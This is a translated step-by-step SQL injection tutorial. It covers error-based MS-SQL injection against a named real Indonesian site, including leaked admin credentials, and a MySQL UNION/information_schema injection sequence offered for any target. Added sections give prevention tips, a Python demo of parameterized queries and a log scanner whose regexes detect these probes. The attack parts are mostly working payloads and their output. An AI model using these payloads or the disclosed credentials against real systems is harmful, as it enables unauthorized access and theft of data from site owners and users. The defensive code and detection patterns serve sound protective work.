MS SQL Injection, step by step

Lately you hear the term "SQL Injection" a lot. Do you know how dangerous this bug is?
Here we present SQL Injection step by step.
Note: we restrict the discussion to SQL Injection in MS-SQL Server.
We take the site www.pln-wilkaltim.co.id as our example.
This site has two weaknesses, namely:
1. The News table
2. The Admin table

The first step is to determine which holes can be injected, by enumerating the input parameters used on the site.
We will find two kinds of input parameters: input entered through a form box, and input passed through the URL address.

We take the easiest one first, the input box. We look for an admin login box and find it at www.pln-wilkaltim.co.id/sipm/admin/admin.asp. The first step is to determine the table name and its fields, so we inject the NIP box with the following command (the password is up to you):
' having 1=1--
Do not forget to write the single quote and the double hyphen (important). For the meaning of these two characters, see the SQL Injection tutorial at www.neoteker.or.id. The following error message then comes out:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Our first field name has come out.
Note the table name: T_ADMIN
Note the field name: NOMOR

Then we find the next field name; the table name may be different.
We inject the NIP box with (the password is up to you):
' group by T_ADMIN.NOMOR having 1=1--
The error message comes out:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
This gives us the table name and our second field.
Record: T_ADMIN.NIP

Then we find our third field:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
The error message comes out:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Record the third field: T_ADMIN.PASSWORD

Repeat the steps above until we find the last field.
Here is the message that appears when we check the last field by injecting:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1--
(note: the command must be entered on one line, not broken across lines as shown here)
--------------------
- nip or password or you have the wrong units !! -
--------------------
We have found the last field.
List of columns (fields):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL

There is only one table for this authentication (i.e. T_ADMIN), which makes our process easier.

The next step is to determine the data types of the fields listed above.

We inject into the box (the password is up to you):
' union select sum(NOMOR) from T_ADMIN--

The meaning of this query: we apply the SUM function before the server checks whether the two rowsets of the UNION have the same number of columns. In plain language, SUM only applies to numeric column types, so for a non-numeric column an error comes out that tells us the type of that column.
Error message:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
This means the NOMOR column type is numeric.
Next we inject:
' union select sum(NIP) from T_ADMIN--
The error message comes out:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
This means the NIP column type is char.

We repeat the command above for each remaining column, replacing nama_kolom (column name) in:
' union select sum(nama_kolom) from T_ADMIN--
with the next column. We get the column types:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

The next step is to find the contents of the password field for the admin user, by injecting:
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
This means we select the smallest user name greater than 'a' and try to convert it to integer type. The number 1 repeated 6 times means that we select only the NAMA column and ignore the other 6 columns.
The error message comes out:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'bill ' to
a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
Note the part:
varchar value 'bill '
'bill' is the user name in the last record entered, i.e. the NAMA column of the last inserted record.

Next we inject:
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where NAMA = 'bill'--
(note: entered on one line)
The error message comes out:
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
This means we succeeded.
We get:
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u

Now log in at:
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
with the account above; the branch (unit) field you fill in yourself by trial and error.

Or we just use the shortcut.

We inject:
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
(note: entered on one line)

This takes us straight to the admin menu.
Remember: do not make mischief! Notify the admin!


The second hole is in the news. The news content basically comes from another table, so we can still inject! The difference is that we must enter the parameters in the URL address.
Example:
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
There are the parameters id and idSM.
When we try to inject, the parameter that has an effect is id.

We inject:
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
The error message comes out:
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
This means 'tb_news.NewsId' is our first table and column.
We repeat the steps above and get:
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime

Well, the rest is your own work, to develop your knowledge.
You can enter whatever text you want and determine the content yourself.
This is why these holes in MS-SQL Server are so dangerous.

=========================================
Specially for ADMIN & WEB PROGRAMMER !!!
========================================
Commonly used prevention strategies:
1. Limit the length of the input box (if possible) in the source code, so that a beginner cracker is confused for a moment when he sees that the input box cannot be injected with a long command.
2. Filter the input entered by the user, especially single quotes (input validation).
3. Turn off or hide the error messages from the running SQL Server.
4. Turn off standard facilities such as stored procedures and extended stored procedures, if possible.
5. Change "Startup and run SQL Server" to use a low-privilege user, in the SQL Server Security tab.
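As an added example (not code from the original post, and not the site's own dologin.asp), here is the login check from the walkthrough above written two ways in Python against a constructed in-memory SQLite copy of T_ADMIN: the column names are the ones the error messages revealed, the row values are made up. The first form pastes the user's text into the statement, which is the defect behind every error message quoted above; the second uses bound parameters, which is what prevention item 2 is really asking for and which no amount of quote filtering replaces (the MySQL probes later on this page contain no quote at all). It also shows prevention item 3: the client only ever receives a fixed message while the driver's error text goes to the server log. The probe fed in is the union query quoted from the page; SQLite is used so the example runs offline, and the same concatenation bug and placeholder fix apply to ASP/ADO against SQL Server.

```python
import logging
import sqlite3

# Constructed stand-in for the T_ADMIN table enumerated above: the column
# names are the ones the error messages revealed, the row values are made up.
SCHEMA = """
CREATE TABLE T_ADMIN (
    NOMOR      INTEGER,
    NIP        TEXT,
    PASSWORD   TEXT,
    NAMA       TEXT,
    KD_RANTING TEXT,
    ADDRESS    TEXT,
    EMAIL      TEXT
)
"""
SAMPLE_ROW = (1, "12345", "constructed-secret", "example-admin", "R01",
              "constructed address", "admin@example.invalid")

# The probe the walkthrough submits in the NIP box (quoted from the page).
UNION_PROBE = "' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--"

COLUMNS = "NOMOR, NIP, PASSWORD, NAMA, KD_RANTING, ADDRESS, EMAIL"
GENERIC_ERROR = "Login failed."


def make_db():
    """In-memory database holding one constructed admin row."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.execute("INSERT INTO T_ADMIN VALUES (?,?,?,?,?,?,?)", SAMPLE_ROW)
    conn.commit()
    return conn


def build_vulnerable_sql(nip, password):
    """How a dologin.asp-style page goes wrong: the user's text is pasted into
    the statement, so a quote ends the literal and '--' comments out the rest."""
    return (f"SELECT {COLUMNS} FROM T_ADMIN "
            f"WHERE NIP='{nip}' AND PASSWORD='{password}'")


def login_vulnerable(conn, nip, password):
    """Runs the concatenated statement; the probe's UNION becomes part of it."""
    return conn.execute(build_vulnerable_sql(nip, password)).fetchone()


def login_parameterized(conn, nip, password):
    """Placeholders: the driver binds nip and password as values, so a quote
    or a UNION inside them is just characters compared against the column."""
    return conn.execute(
        f"SELECT {COLUMNS} FROM T_ADMIN WHERE NIP=? AND PASSWORD=?",
        (nip, password),
    ).fetchone()


def login_with_safe_errors(conn, nip, password):
    """Prevention item 3: any database error is logged server-side and the
    client only ever sees GENERIC_ERROR, never the driver's message."""
    try:
        row = login_parameterized(conn, nip, password)
    except sqlite3.Error as exc:
        logging.getLogger("login").error("database error: %s", exc)
        return None, GENERIC_ERROR
    return row, (None if row else GENERIC_ERROR)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable SQL :", build_vulnerable_sql(UNION_PROBE, "x"))
    print("vulnerable row :", login_vulnerable(db, UNION_PROBE, "x"))
    print("parameterized  :", login_parameterized(db, UNION_PROBE, "x"))
    print("safe errors    :", login_with_safe_errors(db, UNION_PROBE, "x"))
```

Run as a script, the concatenated version returns a row whose first column is the NAMA value even though no NIP matched, while the parameterized version returns nothing for the same input. SQLite does not produce SQL Server's "not contained in an aggregate function" text, so the having / group by probes from the walkthrough are not reproduced here; the point of the example is that the bound-parameter form makes the probe inert regardless of which error text the server would otherwise emit.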

Well, that is about all I can tell...
This is a picture of how insecure the Internet is...
If you want to be more secure, unplug your network cable, remove your disk drives and your hard drive, and sell your computer!
Just kidding :)

References:
[+] SQL Injection, www.BlackAngels.it
[+] Advanced SQL Injection in SQL Server Applications (www.ngssoftware.com)
[+] SQL Injection Walkthrough (www.securiteam.com)


MySQL Injection Step by Step

SQL injection is a hacking action performed from the client application by modifying the SQL command that already exists in memory; it is a client-side technique that exploits web applications that use a database for data storage.

What you need to know before doing MySQL SQL injection:
character: ' or -
comments: /* or --
information_schema: for MySQL version 5.x, not supported in MySQL version 4.x

===========
=First step:=
===========

Find a target.
example: [site]/berita.php?id=100

Add the character ' at the end of the URL, or add the character "-", to see whether an error message appears.
example: [site]/berita.php?id=100' or
[site]/berita.php?id=-100

An error message then appears.

==========
=Second step:=
==========

Find and count the number of tables contained in the database...
use the command: order by

example: [site]/berita.php?id=-100+order+by+1-- or
[site]/berita.php?id=-100+order+by+1/*

Check one by one...
example: [site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

until an error appears or the error message disappears...
example: [site]/berita.php?id=-100+order+by+9--

This means we go up to number 8, which gives:
[site]/berita.php?id=-100+order+by+8--

===========
=Third step:=
===========

To find out which number appears on the page, use the union command.
Because the error came at number 9, we use:
[site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

Suppose the number that comes out is 5.

Use the command version() or @@version to check the SQL version in use; enter the command in place of the number that came out.
example: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- or
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

Look at the version that comes out. If it is version 4, for this version we have to guess the table and column names on the web site ourselves, because we cannot use the command from+information_schema.

For version 5 you are lucky: you do not have to guess the table and column names as in version 4, because in version 5 we can use the command from+information_schema.

============
=Fourth step:=
============

To display the tables that exist on the web site:
command: table_name >>> put in place of the number that came out
command: +from+information_schema.tables/* >>> put after the last number

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

example: the table that appears is "admin"

===========
=Fifth step:=
===========

To display all the contents of the table, the commands are:
command: group_concat(table_name) >>> put in place of the number that came out
command: +from+information_schema.tables+where+table_schema=database() >>> put after the last number

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--

=============
= Sixth step: =
=============

command: group_concat(column_name) >>> put in place of the number that came out
command: +from+information_schema.columns+where+table_name=0xhexa-- >>> put after the last number

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--

At this stage you have to convert the table name to hexadecimal, using a conversion web site such as:

www.ascii-convert.co.cc

For example, the word admin converted to hex becomes 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--

============
=Seventh step:=
============

To output the contents of the columns found earlier from the table:

command: concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> put in place of the number that came out (hasil isi column yg mau dikeluarkan = the columns whose contents you want to output)
command: +from+(nama table berasal) >>> put after the last number (nama table berasal = the table they come from)

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

example: the words that came out were id,username,password

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

==============
= Eighth step:=
==============

Last step: find the admin page or login page.

Then it is up to you, because the web site's power is in your hands.
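As an added example, not from the original post: a small Python log scanner for the defending side that flags, in web-server access log lines, the probe shapes this page uses (the ' having 1=1-- and ' group by probes of the MS-SQL section, and the order by / union select / @@version / information_schema probes of the MySQL section), and that checks a response body for the ODBC error banner quoted throughout the first part, which prevention item 3 says should never reach a client. The log lines, timestamps and addresses are constructed for the example; requests are URL-decoded before matching so %27, %20 or + cannot hide a probe, and a benign "order by date" search is included to show it is not flagged.

```python
import re
from urllib.parse import unquote_plus

# Request signatures, each matching a probe shape shown on this page.
REQUEST_PATTERNS = [
    ("having-probe",       re.compile(r"'\s*having\s+1\s*=\s*1", re.I)),
    ("group-by-probe",     re.compile(r"'\s*group\s+by\s+[\w.]+", re.I)),
    ("union-select",       re.compile(r"\bunion\s+select\b", re.I)),
    ("order-by-count",     re.compile(r"\border\s+by\s+\d+\s*(--|/\*)", re.I)),
    ("information-schema", re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
    ("version-probe",      re.compile(r"(@@version\b|\bversion\(\))", re.I)),
]

# Response signature: the verbose ODBC error banner quoted on this page.
# If it appears in a body sent to a client, prevention item 3 is not in place.
ERROR_LEAK = re.compile(
    r"Microsoft OLE DB Provider for ODBC Drivers \(0x80040E[0-9A-Fa-f]{2}\)"
)

# Common Log Format: ip ident user [time] "method path proto" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log: documentation IP ranges, made-up timestamps, and
# paths reproducing the requests this page walks through plus one benign search.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [10/Oct/2009:13:55:36 +0700] "GET /dari_Media.asp?id=2119&idm=40&idSM=2 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Oct/2009:13:55:41 +0700] "GET /dari_Media.asp?id=2119%27%20having%201=1-- HTTP/1.1" 500 812',
    '198.51.100.7 - - [10/Oct/2009:14:02:10 +0700] "GET /berita.php?id=-100+order+by+9-- HTTP/1.1" 200 4010',
    '198.51.100.7 - - [10/Oct/2009:14:02:15 +0700] "GET /berita.php?id=-100+union+select+1,2,3,4,%40%40version,6,7,8-- HTTP/1.1" 200 4100',
    '198.51.100.7 - - [10/Oct/2009:14:03:01 +0700] "GET /berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 4200',
    '192.0.2.9 - - [10/Oct/2009:14:05:00 +0700] "GET /search.asp?q=new+order+by+date HTTP/1.1" 200 900',
]


def classify_request(raw_path):
    """Return the names of all probe signatures found in one request path.
    The path is URL-decoded first so %27 / %20 / '+' cannot hide a probe."""
    decoded = unquote_plus(raw_path)
    return [name for name, pat in REQUEST_PATTERNS if pat.search(decoded)]


def scan_access_log(lines):
    """Return (line number, client IP, signature names) for each suspicious request."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_LINE.match(line)
        if not m:
            continue  # not in Common Log Format; skip
        hits = classify_request(m.group("path"))
        if hits:
            findings.append((n, m.group("ip"), hits))
    return findings


def response_leaks_db_error(body):
    """True if a response body carries the raw ODBC/SQL Server error banner."""
    return ERROR_LEAK.search(body) is not None


if __name__ == "__main__":
    for n, ip, hits in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"line {n}: {ip} -> {', '.join(hits)}")
```

The signatures are deliberately narrow (a quote directly before having/group by, a numeric order by followed by a comment marker) so that ordinary search text does not trip them; a sequence of order by N requests from one address, followed by a union select, is the enumeration pattern described on this page and is worth an alert on its own.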
